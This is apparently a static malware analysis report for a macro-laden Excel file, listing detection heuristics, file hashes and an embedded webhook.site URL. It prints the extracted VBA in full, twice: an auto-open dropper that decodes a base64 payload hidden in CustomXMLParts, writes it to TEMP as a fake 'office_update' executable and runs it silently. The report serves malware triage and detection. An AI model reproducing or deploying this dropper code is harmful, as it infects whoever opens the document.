Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 ef3774d43b3f1b86…

MALICIOUS

Office (OOXML) / .XLSX

55.9 KB Created: 2026-03-31 07:07:15 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2026-06-20
MD5: 18593be421dfbecfbbf927eb4fa94b67 SHA-1: cfcf1b17ad8245eb58698cab86999c25d64c76c4 SHA-256: ef3774d43b3f1b86dc39cda3b2230b9af6447d411eda91abf22e2aec0c0a5d2b
248 Risk Score

Heuristics 10

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        ' 6. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    RunDropper
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
    RunDropper
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        ' 3. Prepare paths
    tempPath = Environ("TEMP")
    exePath = tempPath & "\office_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://webhook.site/a72d8905-b15f-4e95-9a8f-5e4bb7dc9b3d In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/windows/2004/02/mit/task^In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3800 bytes
SHA-256: a48f50fb7552a4eacf27d60924bbd6f39cc9abfab024b64b6d83cf78829d7374
Preview script
First 1,000 lines of the extracted script
Sub AutoOpen()
    RunDropper
End Sub

Sub Workbook_Open()
    RunDropper
End Sub

' PowerPoint doesn't have an AutoOpen equivalent that runs on file open without an Add-in,
' but it is often triggered via Action Settings or animations. 
' We'll include the core logic here.
Sub OnPPTOpen()
    RunDropper
End Sub

Sub RunDropper()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    Dim hostObj As Object

    ' 1. Identify the Correct Host Object
    Select Case Application.Name
        Case "Microsoft Word"
            Set hostObj = ActiveDocument
        Case "Microsoft Excel"
            Set hostObj = ActiveWorkbook
        Case "Microsoft PowerPoint"
            Set hostObj = ActivePresentation
    End Select

    If hostObj Is Nothing Then Exit Sub

    ' 2. Locate the payload in CustomXMLParts
    For Each xmlPart In hostObj.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 3. Prepare paths
    tempPath = Environ("TEMP")
    exePath = tempPath & "\office_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 4. Decode Base64
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 5. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 6. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False

End Sub

Sub AutoOpen()
    RunDropper
End Sub

Sub Workbook_Open()
    RunDropper
End Sub

' PowerPoint doesn't have an AutoOpen equivalent that runs on file open without an Add-in,
' but it is often triggered via Action Settings or animations. 
' We'll include the core logic here.
Sub OnPPTOpen()
    RunDropper
End Sub

Sub RunDropper()
    On Error Resume Next
    Dim xmlPart As Object
    Dim base64String As String
    Dim tempPath As String
    Dim exePath As String
    Dim binaryData() As Byte
    Dim fNum As Integer
    Dim hostObj As Object

    ' 1. Identify the Correct Host Object
    Select Case Application.Name
        Case "Microsoft Word"
            Set hostObj = ActiveDocument
        Case "Microsoft Excel"
            Set hostObj = ActiveWorkbook
        Case "Microsoft PowerPoint"
            Set hostObj = ActivePresentation
    End Select

    If hostObj Is Nothing Then Exit Sub

    ' 2. Locate the payload in CustomXMLParts
    For Each xmlPart In hostObj.CustomXMLParts
        If xmlPart.DocumentElement.BaseName = "payload" Then
            base64String = xmlPart.DocumentElement.Text
            Exit For
        End If
    Next xmlPart

    If base64String = "" Then Exit Sub

    ' 3. Prepare paths
    tempPath = Environ("TEMP")
    exePath = tempPath & "\office_update_" & Int((9999 - 1000 + 1) * Rnd + 1000) & ".exe"

    ' 4. Decode Base64
    Dim xmlDoc As Object
    Dim xmlNode As Object
    Set xmlDoc = CreateObject("MSXML2.DOMDocument")
    Set xmlNode = xmlDoc.createElement("b64")
    xmlNode.DataType = "bin.base64"
    xmlNode.Text = base64String
    binaryData = xmlNode.nodeTypedValue

    ' 5. Write to disk
    fNum = FreeFile
    Open exePath For Binary Access Write As #fNum
    Put #fNum, , binaryData
    Close #fNum

    ' 6. Execute
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run exePath, 0, False

End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 18432 bytes
SHA-256: 304046c6162c4d842c1638d7f274725d57cf33e43923e614b967e66227dca447
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.